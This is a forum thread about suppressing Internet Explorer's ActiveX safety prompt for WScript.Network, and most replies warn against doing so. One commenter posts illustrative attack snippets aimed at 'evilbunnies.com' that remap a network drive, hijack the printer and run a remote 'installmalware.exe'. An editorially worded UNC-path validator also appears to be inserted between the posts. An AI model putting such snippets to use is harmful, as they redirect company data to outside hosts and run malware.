Coffeehouse Thread

16 posts

Forum Read Only

This forum has been made read only by the site admins. No new threads or comments can be added.

ActiveXObject

  • pavone

     I have the following javascript:

    var WshNetwork = new ActiveXObject("WScript.Network");
    var Drives = WshNetwork.EnumNetworkDrives();

    Which gives me this warning:
    "An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction?  YES  NO"

    Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

     

  • blowdart

    pavone wrote:

     I have the following javascript:

    var WshNetwork = new ActiveXObject("WScript.Network");
    var Drives = WshNetwork.EnumNetworkDrives();

    Which gives me this warning:
    "An ActiveX control on this page might be unsafe to interact with other parts of the page. Do you want to allow this interaction?  YES  NO"

    Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

    Oh boy. You want to do that in javascript? Please don't. By turning that warning off you would allow any web site to start running commands against your network. Not, I think, something you want to do.

     

  • AndyC

    @blowdart: +1

    I'm a tad afraid to ask why you'd ever want to do that in the first place?

  • pavone

     No other way to do what I need I'm afraid. Not the method I'd prefer of doing it either, but I'm just the junior code monkey following instructions. 

    Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not. 

    What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select. 

  • AndyC

    The only way to do exactly that would be to mark the WSH object as "Safe for Scripting", which would basically hand complete and total control of the PC over to any web page that fancied it. Which would be an epically bad idea by anyone's standards.

    For a very limited usage scenario, and given that your end users are clearly using IE, why not just create a custom ActiveX control marked as safe-for-scripting that performs the correct drive enumeration for you? Given it'll be internal only, it's very unlikely some random website would prod at it, and even if they did, it'd only offer very constrained functionality rather than that provided by a generic scripting control.

  • felix9

    pavone wrote:

    Does anyone know how I can make it so that I can ask the user to install or do something so that that message doesn't pop up again?

    Add this site to the trusted zone. Not automatically, but you can ask the user to do it.

  • evildictaitor

    Try putting the code you want to run in a JS file, and then asking the users to download the script and run it on their machine.

    At least then your users would be choosing to hand their machine to the website on a site-by-site basis.

    If you have any kind of security policy at your work, you will certainly be breaching it by marking things like WScript.Network as "Safe for Scripting".

  • figuerres

    pavone wrote:

     No other way to do what I need I'm afraid. Not the method I'd prefer of doing it either, but I'm just the junior code monkey following instructions. 

    Preferably I'd like that message turned off for my site only, an intranet site which only allows access to a few selected people. But any method to turn that message off would work, I'll leave it to the users whether they want to or not. 

    What I'm doing is, reading users' mapped drives to the actual UNC paths so I can copy files from whatever mapped path they select. 

    then please please talk to the boss about this .... point out that multiple developers are all saying this is really not a good idea, some of us have been developing for a *LONG TIME* like over 20 years and we know what we are saying. also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....

    I know that in some places there is a trend to "do it all in a web page" as that removes the need to deploy software on desktops and they think that is the way to go... sometimes that is true but not all the time.

    one of the reasons that some folks used to bash Microsoft was they used to just let you run anything you wanted with very little to stop the user from totally f**** ing themselves.

    this is not a good idea,  if you start allowing script on a web page to have local machine access rights then you become wide open to all kinds of evil attacks .....

    if you let it enumerate drives what else can it do ? you might also then be allowing a command to format a drive or delete files or copy stuff w/o asking the user for permission.

    please re-think this.

     

  • blowdart

    figuerres wrote:

    also one of the folks here who is saying this works for microsoft and knows a thing or two about web servers ....

    And has written a book on web security.

     

    And yes, once you allow wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.

  • evildictaitor

    <html>
      <head><title>Look! Dancing bunnies!</title></head>
      <body>
        <img src="http://www.evilbunnies.com/picture.gif" width=100 height=100 />
        <script>
    var objNet = new ActiveXObject("WScript.Network");
    objNet.RemoveNetworkDrive("Z:"); // remove the "customer information" drive
    objNet.MapNetworkDrive("Z:", "\\evilbunnies.com\netdrive\"); // replace it with an Internet drive

    var user = objNet.Username;

      setTimeout("alert('Oi! "+user+"! This is the head of IT, noticing that you're not doing work! Get back to work putting client data in the Z: drive, or I'll have your head!')", 1000);
       </script>
    </body></html>

  • evildictaitor

    Also:

    objNet.AddWindowsPrinterConnection("\\evilbunnies\printer");
    objNet.SetDefaultPrinter("\\evilbunnies\printer");
    alert("Shouldn't you get back to work, printing out your private emails and documents?");

  • evildictaitor

    Blowdart said:

    And yes, once you allow wscript you allow deletion of files, copying of files, generally messing around with the file system, network drives, all sorts of other fun things.

    WScript is even worse than WScript.Network:

    WScript.Exec("\\evilbunnies.com\installmalware.exe", 0);

    Sad times for your business if you allow it from the Internet zone.

  • evildictaitor

    Pavone said:

    but I'm just the junior code monkey following instructions. 

    You're the junior code monkey who will be fired when your company gets owned up by your foolish actions.

    Don't play the game of "it'll never happen to me" or "security is just some theoretical risk". People can and do own-up small companies, and when it happens to yours, your fingerprints will be on the trigger when the CEO comes looking for a scapegoat.

    Play it safe. Make sure you play no part in a decision that could very well lead to your company losing all of its trade secrets and customer details. You really don't want to be the guy that let that happen.

  • Charles

    Why does this LOB app have to be a web page?

    C

  • pavone

     I made another version where the only difference is that it requires a UNC path and makes no use of ActiveX whatsoever, if the client is fine with it, then it's all good. 

    If not, then how effective would it be to let this site into their Trusted Sites, such that only this website could make use of this ActiveX object? I noticed that this website already works in our network with the only caveat of producing a pop-up asking for confirmation, so it's not like I need to make any changes to the systems as I initially thought. Recall that this is an intranet site, no one will change internet zones. 

    Regards 

     

    -- Update ---

    Looks like browse with UNC path will do fine.

    Thanks for the feedback.
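The "browse with UNC path" version pavone settled on still takes a path typed by the user, so the page should check that input before handing it to the server-side copy job. The block below is an added example, not code from the thread or from pavone's application: it parses a UNC path in JavaScript without any ActiveX object, rejects drive letters, forward-slash forms, "." and ".." segments and hidden/admin shares ending in "$", and goes one step beyond the thread by checking the host against an allow-list of file servers. The `ALLOWED_HOSTS` names, the `$`-share rule and the function names are assumptions made for illustration.

```javascript
// Added example (not from the thread): validate a user-typed UNC path for the
// ActiveX-free version of the intranet page. The page asks the user for a UNC
// path instead of enumerating mapped drives through WScript.Network, so no
// safe-for-scripting object is involved and the browser warning never appears.

// Hosts the copy job may read from (constructed sample allow-list; assumption).
const ALLOWED_HOSTS = ["fileserver01", "fileserver02.corp.example"];

// \\host\share or \\host\share\sub\dir, optional trailing backslash.
// Host: letters, digits, dots, hyphens. Share and segments: no backslash,
// forward slash, Windows-reserved punctuation or control characters.
const UNC_RE =
  /^\\\\([A-Za-z0-9][A-Za-z0-9.-]*)\\([^\\\/:*?"<>|\x00-\x1f]+)((?:\\[^\\\/:*?"<>|\x00-\x1f]+)*)\\?$/;

// Returns true for a single path component the copy job may accept.
function isSafeComponent(s) {
  if (s === "." || s === "..") return false;  // no traversal components
  if (s.trim() !== s) return false;           // no leading/trailing whitespace
  return true;
}

// Parse input into { host, share, segments } or return null when it is not a
// well-formed, traversal-free UNC path. Host is lower-cased for comparison.
function parseUncPath(input) {
  const m = UNC_RE.exec(String(input).trim());
  if (!m) return null;
  const host = m[1].toLowerCase();
  const share = m[2];
  const segments = m[3] ? m[3].split("\\").filter((s) => s.length > 0) : [];
  if (!isSafeComponent(share)) return null;
  if (share.endsWith("$")) return null;       // hidden/admin shares such as C$ (assumed policy)
  if (!segments.every(isSafeComponent)) return null;
  return { host, share, segments };
}

// Allow-list check: only paths on known file servers pass.
function isAllowedUncPath(input, allowedHosts = ALLOWED_HOSTS) {
  const p = parseUncPath(input);
  if (!p) return false;
  const hosts = allowedHosts.map((h) => h.toLowerCase());
  return hosts.includes(p.host);
}

// Canonical form to send to the server: lower-cased host, no trailing backslash.
function normalizeUncPath(input) {
  const p = parseUncPath(input);
  if (!p) return null;
  return "\\\\" + p.host + "\\" + p.share + p.segments.map((s) => "\\" + s).join("");
}

// Usage, e.g. from the form's submit handler (constructed sample inputs):
const typed = "\\\\FileServer01\\reports\\2012\\q1";
if (isAllowedUncPath(typed)) {
  console.log("accepted:", normalizeUncPath(typed));
} else {
  console.log("rejected:", typed);
}
```

Because the check runs in the browser it is only a usability aid; the server that performs the copy must repeat the same parse and allow-list check on the submitted path, since anyone on the intranet can post a form without the script.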

  • figuerres

    Charles wrote:

    Why does this LOB app have to be a web page?

    C

     

    well i am guessing here based on what the OP has posted so far:  they like using web pages at that company.

    I have seen this kind of thinking many times before Charles.   for example i worked at one point on an app for a fairly large business and the app had to get data from 2 different web sites  by driving websites around ( lots of crazy code doing web posts / gets and forms) to then get them to send back comma delimited data replies that i then had to clean up and import the data into a database.

    the suppliers did not have a simple way to pull a data feed any other way, they included FedEx.  the data was not the normal shipping data, this had to do with cargo ships bills of lading originating in china coming to ports on the US east coast.

    when i was brought in the app did not automate importing the data, humans had to follow a 25 to 30 step manual process. errors in that process did not show up for weeks.... i made it a 5 step process that reduced the errors and the time it took them.

    it took 2 months to get them to ok using .net on 3 computers to run the app.

    as a consultant i had to play nice and get the staff happy with the idea, in the end they loved what i was doing and all that but then the business was sold and we all moved on to other stuff.

    this was a business that had probably 10,000 desktop pc's running Windows 2000 Pro in 2005-2006
